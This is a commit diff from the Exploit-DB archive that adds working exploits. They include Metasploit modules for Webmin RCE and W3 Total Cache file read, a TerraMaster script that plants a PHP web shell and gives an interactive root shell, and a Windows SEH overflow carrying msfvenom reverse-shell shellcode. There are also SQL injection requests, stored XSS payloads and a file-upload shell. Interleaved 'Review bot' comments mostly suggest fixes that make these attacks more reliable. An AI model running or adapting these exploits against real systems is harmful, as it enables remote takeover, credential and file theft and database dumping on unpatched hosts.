DB: 2020-12-23

12 changes to exploits/shellcodes

10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
Victor CMS 1.0 - File Upload To RCE
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
CSE Bookstore 1.0 - Multiple SQL Injection
Library Management System 3.0 - _Add Category_ Stored XSS
Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)
Artworks Gallery Management System 1.0 - 'id' SQL Injection
Faculty Evaluation System 1.0 - Stored XSS
TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
Offensive Security 2020-12-23 05:01:59 +00:00
parent cd30696d15
commit 3aeb1a0d81
13 changed files with 739 additions and 0 deletions

165
exploits/linux/webapps/49318.rb Executable file

@ -0,0 +1,165 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.962 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
It emerged by circumventing the measure taken for CVE-2019-12840.
s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
Therefore, since the package name variable is placed directly in the system command,
we can manipulate it using some escape characters that HTTP supports.
For example, we can escape control by dropping the command line down one line.
We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
we must add double an ampersand(&&) to the end of the payload (%26%26)
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2020-35606'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'RPORT' => 10000,
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_perl'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [['Webmin <= 1.962', {}]],
'DisclosureDate' => '2020-12-21',
'DefaultTarget' => 0)
)
register_options [
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1', # it must be used for "Error - No cookies"
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD']
}
})
if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
return $1
end
return nil unless res
''
end
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
# check version
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
'cookie' => "sid=#{cookie}",
'vars_get' => { "xnavigation" => "1" }
})
if res && res.code == 302 && res.body
version = res.body.split("Webmin 1.")[1]
return CheckCode::Detected if version.nil?
version = version.split(" ")[0]
if version <= "962"
# check package update priv
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "package-updates/"),
'cookie' => "sid=#{cookie}"
})
if res && res.code == 200 && res.body =~ /Software Package Update/
print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
return CheckCode::Vulnerable
end
end
end
print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
def exploit
cookie = login
if cookie == '' || cookie.nil?
fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
end
print_good("Session cookie: #{cookie}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
'cookie' => "sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
run_update(cookie)
end
def run_update(cookie)
@b64p = Rex::Text.encode_base64(payload.encoded)
perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
payload = Rex::Text.uri_encode(perl_payload)
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "sid=#{cookie}",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
'headers' =>
{
'Referer' => "#{peer}/package-updates/?xnavigation=1"
},
# new vector // bypass to backslash %0A%7C{}%26%26
'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
# for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
})
end
end
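Review bot: In `check`, `version <= "962"` is a lexicographic string comparison, so the verdict depends on how many digits the extracted token has rather than on numeric order, and hosts can be misclassified in either direction; compare parsed versions instead, e.g. `Gem::Version.new(version) <= Gem::Version.new('962')`, after confirming the token is numeric. The fall-through at the end of `check` also prints the "doesn't have the right" message and returns `CheckCode::Safe` when the sysinfo.cgi request merely failed or returned an unexpected status, which reads as a clean result; `CheckCode::Unknown` would be the honest answer on that path. Separately, `'SSL' => false` in `DefaultOptions` means the Webmin `USERNAME`/`PASSWORD` are posted to session_login.cgi in cleartext unless the operator overrides it, which deserves a line in the description. The module also declares no `'Notes'` block (`Stability`, `Reliability`, `SideEffects`), so anyone running it has no stated expectation of what it leaves in the target's logs.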

66
exploits/linux/webapps/49321.py Executable file

@ -0,0 +1,66 @@
# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
# Date: 12/12/2020
# Exploit Author: IHTeam
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
# Vendor Homepage: https://www.terra-master.com/
# Version: <= 4.2.06
# Tested on: 4.1.30, 4.2.06
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
args = parser.parse_args()
url = args.url
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
epoch_time = int(time.time())
shell_filename = "debug"+str(epoch_time)+".php"
def check_endpoint(url, headers):
response = requests.get(url+'/version', headers=headers, verify=False)
if response.status_code == 200:
print("[+] TerraMaster TOS version: ", str(response.content))
else:
print("\n[-] TerraMaster TOS response code: ", response.status_code)
sys.exit()
def upload_shell(url, headers, shell_filename):
payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
payload = urllib.parse.quote(payload, safe='')
print("[/] Uploading shell...")
response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
time.sleep(1)
response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
print("[+] Upload succeeded")
else:
print("\n[-] Error uploading shell: ", response.content)
sys.exit()
def interactive_shell(url, headers, shell_filename, cmd):
response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
print(str(response.text)+"\n")
def delete_shell(url, headers, shell_filename):
delcmd = "rm /usr/www/"+shell_filename
response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
print("\n[+] Shell deleted")
check_endpoint(url, headers)
upload_shell(url, headers, shell_filename)
try:
while True:
cmd = input("# ")
interactive_shell(url, headers, shell_filename, cmd)
except:
delete_shell(url, headers, shell_filename)
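Review bot: Cleanup of the dropped PHP file is only attempted from the bare `except:` around the input loop, and `delete_shell` prints "Shell deleted" without looking at the response, so an exit path outside that handler (for instance the `sys.exit()` in `upload_shell`, reached after the write request has already been sent) can leave a PHP file that runs commands as root under /usr/www. Wrap the session in `try: ... finally: delete_shell(url, headers, shell_filename)` and confirm removal by checking that a follow-up request for the file no longer returns 200. The bare `except:` also hides ordinary request errors, and every call passes `verify=False` with the warning suppressed, which the header comment should state because TLS validation is off for the whole run. For responders, a `debug` + Unix-timestamp `.php` file in the web root is the artefact this script creates.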


@ -4,6 +4,7 @@
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================


@ -0,0 +1,19 @@
# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Date: 20.12.2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Apache2/Linux
Step1: register http://localhost/CMSsite-master/register.php
step2: login as user
step3: Go to Profile
step4: upload imag as php file (upload shell.php)
step5: update user
step6: You will find your shell in img folder :/path/img/cmd.php
http://localhost/CMSsite-master/img/cmd.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


@ -0,0 +1,82 @@
# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv
# POC
POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"
300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"
3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"
on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"
Next
-----------------------------308827614039434535382911921119--


@ -0,0 +1,110 @@
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date : 2020-12-21
# Author : Musyoka Ian
# Version : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform : PHP
# Tested on : Debian
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
Below is results returned by SQLMap
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
POC 1
REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
POC 2
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
REQUEST
=======
POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
POC 3.
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1


@ -0,0 +1,20 @@
# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage: https://otsglobal.org/
# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
# Affected Version: 3.0
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as Admin.
Step 2. Select "Book" from menu and select "Categories" from sub menu and
after that click on "Add Category".
Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name"
Step 4. Now Click on "Save" , Go to "Category" and See last , there you
will get alert box.


@ -0,0 +1,18 @@
# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-21
# Google Dork: N/A
# Vendor Homepage: https://www.ramomcoder.com/
# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
# Affected Version: 3.5
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as Super Admin.
Step 2. Select "Branch" from menu and after that click on "Create Branch".
Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" ,
"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
Step 4. Now Click on "Save" and you will get a list of alert boxes.

86
exploits/php/webapps/49317.rb Executable file

@ -0,0 +1,86 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in WordPress plugin
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
the web server privileges.
},
'References' =>
[
['CVE', '2019-6715'],
['WPVDB', '9248'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
],
'Author' =>
[
'VinhJAXT', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => '2014-09-20',
'License' => MSF_LICENSE
)
)
register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
]
)
end
def check
check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ %r{^/}
json_body = { 'Type' => "SubscriptionConfirmation",
'Message' => '',
'SubscribeURL' => "file:///#{traversal}#{filename}"
}
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
fail_with Failure::Unreachable, 'Connection failed' unless res
fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'w3_total_cache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
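Review bot: The version bounds passed in `check` do not match the description: `'0.9.26'` parses as a release newer than the `'0.9.4'` fix boundary, while the text says 0.9.2.6-0.9.3 are affected, so the introduced-version argument is presumably meant to be `'0.9.2.6'`. As written the affected range is effectively empty and the check can mislabel installations. The `'DisclosureDate' => '2014-09-20'` also sits oddly beside a 2019 CVE reference and should be confirmed against the advisory. In `run_host`, the retrieved file body is echoed with `print_line` before it is stored as loot; for files that hold secrets this leaves the content in console logs, so printing only the loot path is the safer default.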


@ -0,0 +1,64 @@
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Tested on Kali Linux
Step 1. Log in to the application with admin credentials.
Step 2. Click on "Explore" and then select "Artworks".
Step 3. Choose any item, the URL should be "
http://localhost/art-bay/info_art.php?id=6
Step 4. Run sqlmap on the URL where the "id" parameter is given
sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 4531=4531
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=8 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
-
---
[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---
Step 5. Sqlmap should inject the web-app successfully which leads to
information disclosure.


@ -0,0 +1,19 @@
# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
# Exploit Author: Vijay Sachdeva (pwnshell)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
# Tested on Kali Linux
Step 1: Log in to the application with admin credentials
Step 2: Click on Questionnaires, then click "Action" for any Academic Year
and then click manage.
Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of
the Question form.
Step 4. Click on "Save" when done and this will trigger the Stored XSS
payloads. Whenever you click on Questionnaires, click action for any
academic year, and then manage, your XSS Payloads will be triggered for
that "Academic Year"

78
exploits/windows/local/49322.py Executable file

@ -0,0 +1,78 @@
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
# Date: 2020-12-22
# Exploit Author: Florian Gassner
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.05
# Tested on: Windows 10 x64
# Computer -> From Text File -> Choose exploit.txt
import struct
"""
Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
"""
OFFSET = 214
"""
badchars = '\x00\x09\x0a\x0d\x3a\x5c'
"""
"""
Log data, item 23
Address=01015AF4
Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
"""
pop_pop_ret = struct.pack("<I", 0x01015af4)
short_jump = '\xEB\x06\x90\x90'
"""
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
"""
shellcode = ""
shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
payload = 'A' * (OFFSET - len(short_jump))
payload += short_jump
payload += pop_pop_ret
payload += '\x90' * 8
payload += shellcode
f = open("exploit.txt", "w")
f.write(payload)
f.close()
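Review bot: The header never states which interpreter this script targets, yet it concatenates `struct.pack` output with text string literals and writes the result through a text-mode `open("exploit.txt", "w")`, which only behaves as a byte-for-byte write on Python 2. Add a header line such as `# Requires: Python 2` and use `with open(...) as f:` so the handle is closed on error. The embedded blob is tied to the author's lab address in the quoted msfvenom command and is not reproducible from the script itself, so the comment should say it is an environment-specific sample. For defenders, the pasted log line is the useful part: it shows NetworkInventoryExplorer.exe loaded with ASLR, Rebase and SafeSEH all False, which is the build-hardening gap the vendor would need to close.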


@ -11232,6 +11232,7 @@ id,file,description,date,author,type,platform,port
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43524,3 +43525,13 @@ id,file,description,date,author,type,platform,port
49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
